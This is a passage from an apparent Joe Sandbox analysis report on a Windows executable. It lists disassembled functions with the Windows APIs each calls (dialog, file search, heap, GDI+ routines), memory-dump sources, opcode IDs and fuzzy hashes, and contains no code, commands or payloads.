                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3351165006-0
                                                                                              • Opcode ID: d1ba8105fb055dfec309d02cd4597558403e16ffab7b757f6632a2b8304da695
                                                                                              • Instruction ID: 8c1a66898dc0bbedd99a1d2da3a57662a1d6c2fcae75a601888f1cf53a8d84e4
                                                                                              • Opcode Fuzzy Hash: d1ba8105fb055dfec309d02cd4597558403e16ffab7b757f6632a2b8304da695
                                                                                              • Instruction Fuzzy Hash: 75C012B205C200BECB020BB5DC09D2BBBA8ABE4212F00CA08B2E5E0060C239C014DB21
                                                                                              Function 00E61CC4 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,?), ref: 00E61CD2
                                                                                              • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00E61CD9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherItemUser
                                                                                              • String ID:
                                                                                              • API String ID: 4250310104-0
                                                                                              • Opcode ID: e171ef955c52decf4a1efbb538e6ac95be3b1b88024dba5a76b0b84c311f0c1a
                                                                                              • Instruction ID: fc88e45cdaa58e4edd57e0869ea72b4162afe4675305f49509a627f15aa4e765
                                                                                              • Opcode Fuzzy Hash: e171ef955c52decf4a1efbb538e6ac95be3b1b88024dba5a76b0b84c311f0c1a
                                                                                              • Instruction Fuzzy Hash: AEC04C7640D240BFCB015BA59D1CC2FBFA9ABD5311F00CA49F6E590561C635C414DB21
                                                                                              Function 00E627E0 Relevance: 1.8, APIs: 1, Instructions: 306COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: 4b019f3a7832f9c6a099ec8314f5c2e4e35b5f10a4242205ff83be10758ae3eb
                                                                                              • Instruction ID: 26841c98a0d601e8cdfcc1a9111bb122bac8af53c1b8882c0ff5a538059427a5
                                                                                              • Opcode Fuzzy Hash: 4b019f3a7832f9c6a099ec8314f5c2e4e35b5f10a4242205ff83be10758ae3eb
                                                                                              • Instruction Fuzzy Hash: B6C1CF30A44A449BDF25DF64E8947ED3BE0AB85344F1860BEEE05FF296C7749844CBA1
                                                                                              Function 00E620B0 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 00E620B7
                                                                                                • Part of subcall function 00E680EC: __EH_prolog3.LIBCMT ref: 00E680F3
                                                                                                • Part of subcall function 00E72815: __EH_prolog3.LIBCMT ref: 00E7281C
                                                                                                • Part of subcall function 00E676E7: __EH_prolog3.LIBCMT ref: 00E676EE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: 1487c938a1883322138918ab11b2fab4b30586663252fb832d0bd27a0ba43cda
                                                                                              • Instruction ID: c73aa681a3bab9e1240cd5a1987e5ec90d6131979061857c876dd0c0189b80e3
                                                                                              • Opcode Fuzzy Hash: 1487c938a1883322138918ab11b2fab4b30586663252fb832d0bd27a0ba43cda
                                                                                              • Instruction Fuzzy Hash: 3B5106B19097808EDB44DF2A94807C97BE0AF59300F0896BEDD4DDF6ABDB740204CB61
                                                                                              Function 00E6B3E1 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E6B3E8
                                                                                                • Part of subcall function 00E6F711: FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,00E6A684,?,?,00000000,?,?,?,?,?,?), ref: 00E6F739
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseFindH_prolog3_
                                                                                              • String ID:
                                                                                              • API String ID: 2672038326-0
                                                                                              • Opcode ID: cae28af075c4be7eec8852e5c30424f5a40030b4208c51fea14eb04087ab5237
                                                                                              • Instruction ID: 7df746a0cf439a093c86953dbeb1290350ce16080bcd0d10f73c292dc29e4ed2
                                                                                              • Opcode Fuzzy Hash: cae28af075c4be7eec8852e5c30424f5a40030b4208c51fea14eb04087ab5237
                                                                                              • Instruction Fuzzy Hash: 46415C709406088FDB20DFA9E8816E9B7F1BF45348F14546DE15AEB252EB30A885CB25
                                                                                              Function 00E62C30 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E62C37
                                                                                                • Part of subcall function 00E7880E: __EH_prolog3.LIBCMT ref: 00E78815
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3H_prolog3_
                                                                                              • String ID:
                                                                                              • API String ID: 3355343447-0
                                                                                              • Opcode ID: d994bb52f1059906c1fd6a669863cdcb0dcc3cfb16407173707b9b1266582046
                                                                                              • Instruction ID: 49b1d005d7b2f6d3b2e72b971a78e94796925e04d92bcdd8f292a5eaf1be9fa4
                                                                                              • Opcode Fuzzy Hash: d994bb52f1059906c1fd6a669863cdcb0dcc3cfb16407173707b9b1266582046
                                                                                              • Instruction Fuzzy Hash: A1314A7194060CAFCF19EBE4E8859EEBBF9AF18380F54642EF505B7251CB319985CB20
                                                                                              Function 00E797A4 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: 0f7616d96a8e3db80c440df45e29b1f3a078db65cc25ac51f6e62ae06e9d0da6
                                                                                              • Instruction ID: 427fb9ebe1f1e9b2d3394ae5493e2523e6a7b386b51ff077879c494d25a42c09
                                                                                              • Opcode Fuzzy Hash: 0f7616d96a8e3db80c440df45e29b1f3a078db65cc25ac51f6e62ae06e9d0da6
                                                                                              • Instruction Fuzzy Hash: F521F571D016129BEF1CAF748C4AA5E76A8BF05314F05613AE50DBB2C2EB749940C7E5
                                                                                              Function 00E6D771 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: 2cee6958b491f7c79de6a19e80b06f9719de0b8457ea7d7d81e76abd1e7efe76
                                                                                              • Instruction ID: 9e94f6c7925978b487c9224a484039993896f4b9755b01d4b50e33d86ba78ad3
                                                                                              • Opcode Fuzzy Hash: 2cee6958b491f7c79de6a19e80b06f9719de0b8457ea7d7d81e76abd1e7efe76
                                                                                              • Instruction Fuzzy Hash: A4215172F4061A9BDB15DFE9DC81AAEB7F9EF88340F14541AE504B7201DF74AE008BA5
                                                                                              Function 00E6EAF3 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_
                                                                                              • String ID:
                                                                                              • API String ID: 2427045233-0
                                                                                              • Opcode ID: ca8590fe9d07c15c43750a315dfb33e41169cf1b95b31d2d0d673cf17c8ce3c1
                                                                                              • Instruction ID: b8936a936d8c4bab4fa1c36bafcc7de792f56769c2f6465a2aceaf4fc0db7942
                                                                                              • Opcode Fuzzy Hash: ca8590fe9d07c15c43750a315dfb33e41169cf1b95b31d2d0d673cf17c8ce3c1
                                                                                              • Instruction Fuzzy Hash: 8821CF38680308AADF309A68E846AEE73E9EF12794F147448F452B73C1CA30994987A0
                                                                                              Function 00E8437D Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_
                                                                                              • String ID:
                                                                                              • API String ID: 2427045233-0
                                                                                              • Opcode ID: 15979a8c25bfe323b703ed86e766c022014b7bd556370670409ac1432809157f
                                                                                              • Instruction ID: d1275246e6ab405398c87d996122afa748cfc9abfa286493b0a6b0667c9bab6e
                                                                                              • Opcode Fuzzy Hash: 15979a8c25bfe323b703ed86e766c022014b7bd556370670409ac1432809157f
                                                                                              • Instruction Fuzzy Hash: 35214FB1900109DEDF09EB94D886EDE7BF9EF48300F14602AE109F7291DA359A458B61
                                                                                              Function 00E84300 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_
                                                                                              • String ID:
                                                                                              • API String ID: 2427045233-0
                                                                                              • Opcode ID: 5f296e6b68bf915fa68ada2d0ac22e2c18685741ac3b9f07b530965be2cd9482
                                                                                              • Instruction ID: 5edb3db2bbf0da4bf4e389bb09ba30c3439b094eb3c5c6c756f09aed8a388e24
                                                                                              • Opcode Fuzzy Hash: 5f296e6b68bf915fa68ada2d0ac22e2c18685741ac3b9f07b530965be2cd9482
                                                                                              • Instruction Fuzzy Hash: 63016DB1841249EADF00FBE0D886ACE77F8EF14344F44A065F50CB6182CA349B49CB71
                                                                                              Function 00E680EC Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: 694b784f6588acac0f04bfcc1901848327a534a1e1ffe6187aae8665f1d19671
                                                                                              • Instruction ID: e1f8f8e2f04af8bf58cd1dca02fd1366cc1d98e9a5a7b4bb2349b548de95263c
                                                                                              • Opcode Fuzzy Hash: 694b784f6588acac0f04bfcc1901848327a534a1e1ffe6187aae8665f1d19671
                                                                                              • Instruction Fuzzy Hash: C5F062F1681B44AAD631EB259D43F9BBBD8AB94B04F40541EB35D771C2DFB02201C759
                                                                                              Function 00E9040E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,00E8535E,?,?,00E86C16,?,?,?,?,?,00E85269,00E8535E,?,?,?,?), ref: 00E90440
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 3852b2ea6b73009d96f98ea04ca6a0d09f04741a203c4b1d400d687e5aee9ce5
                                                                                              • Instruction ID: 93e2507539c571ed08e10c1d5e351929517c2fdbb07918424e3d3df870fbb19e
                                                                                              • Opcode Fuzzy Hash: 3852b2ea6b73009d96f98ea04ca6a0d09f04741a203c4b1d400d687e5aee9ce5
                                                                                              • Instruction Fuzzy Hash: D3E065311412219EDE2137669C01B5B3AC9DF417B4FA96121EE6CB6291DB64CC0092E1
                                                                                              Function 00E6F711 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00E6F826: __EH_prolog3_GS.LIBCMT ref: 00E6F830
                                                                                                • Part of subcall function 00E6F826: FindFirstFileW.KERNELBASE(?,?,00000274,00E6F733,000000FF,00000049,00000049,?,?,00E6A684,?,?,00000000,?,?,?), ref: 00E6F859
                                                                                                • Part of subcall function 00E6F826: FindFirstFileW.KERNEL32(?,?,?,?,?,00E6D303,?,?,?,?,?,?,?,522FB702,00000049), ref: 00E6F8A4
                                                                                                • Part of subcall function 00E6F826: GetLastError.KERNEL32(?,?,?,00E6D303,?,?,?,?,?,?,?,522FB702,00000049,?,00000000), ref: 00E6F902
                                                                                              • FindClose.KERNELBASE(00000000,000000FF,00000049,00000049,?,?,00E6A684,?,?,00000000,?,?,?,?,?,?), ref: 00E6F739
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$FileFirst$CloseErrorH_prolog3_Last
                                                                                              • String ID:
                                                                                              • API String ID: 765066492-0
                                                                                              • Opcode ID: 58c5565fc566457e3606b773a4dec3be9627a24bc59ae0017dcb8f6b8c965665
                                                                                              • Instruction ID: e6dfcc697dbb42e33566ec6e194b8e693f855a68881fae6a6a5cc47dbf37cbd7
                                                                                              • Opcode Fuzzy Hash: 58c5565fc566457e3606b773a4dec3be9627a24bc59ae0017dcb8f6b8c965665
                                                                                              • Instruction Fuzzy Hash: C0F0A735049750AECE212B746805A8B7FD16F173B5F105B4AF0FD32193C630A0549B26
                                                                                              Function 00E773F8 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00E7742D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExecutionStateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2211380416-0
                                                                                              • Opcode ID: 7700734795e0721bfeaa55e15c5b7f82b4771c09855aeafec05bacfaee16a26c
                                                                                              • Instruction ID: cb2ff717b2f1c801e3100cc10b16ce21fe56192fba7b2afa73d3a38e0895f682
                                                                                              • Opcode Fuzzy Hash: 7700734795e0721bfeaa55e15c5b7f82b4771c09855aeafec05bacfaee16a26c
                                                                                              • Instruction Fuzzy Hash: D6D0C20164801036EA11373539DA7FD298A4FCB355F087026B14C362939A94084A83A6
                                                                                              Function 00E611DD Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 00E61206
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency::cancel_current_task
                                                                                              • String ID:
                                                                                              • API String ID: 118556049-0
                                                                                              • Opcode ID: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
                                                                                              • Instruction ID: 32a63b50f8f8138bc520e97be77aaee7446d7a4c3382377536a55790e4021a7a
                                                                                              • Opcode Fuzzy Hash: b6dbc1ff7d9b6923f3e65d4a1a5089bb0344b4586f9250eb3f5b27e450492f1d
                                                                                              • Instruction Fuzzy Hash: 50D05E766426024EC72EFB34D47682E72E05E5038A35862ADF02EEA691EF21CC55D715
                                                                                              Function 00E7EB06 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GdipAlloc.GDIPLUS(00000010), ref: 00E7EB0C
                                                                                                • Part of subcall function 00E7E849: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00E7E86A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                              • String ID:
                                                                                              • API String ID: 1915507550-0
                                                                                              • Opcode ID: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
                                                                                              • Instruction ID: 0f126ce1b5d4c11175c1da73798b36006022b266201856fa49a83794221898e4
                                                                                              • Opcode Fuzzy Hash: 40d26e3062f3a0a4d923ad9eb1023a0fc0ac8bf0375a6db8f64136e7eac3b51d
                                                                                              • Instruction Fuzzy Hash: 0CD0A930200309BAEF152F348C02DBE7AD8EF08340F00E061B80EA5290EEB0EE10A6A1
                                                                                              Function 00E84231 Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00E84256
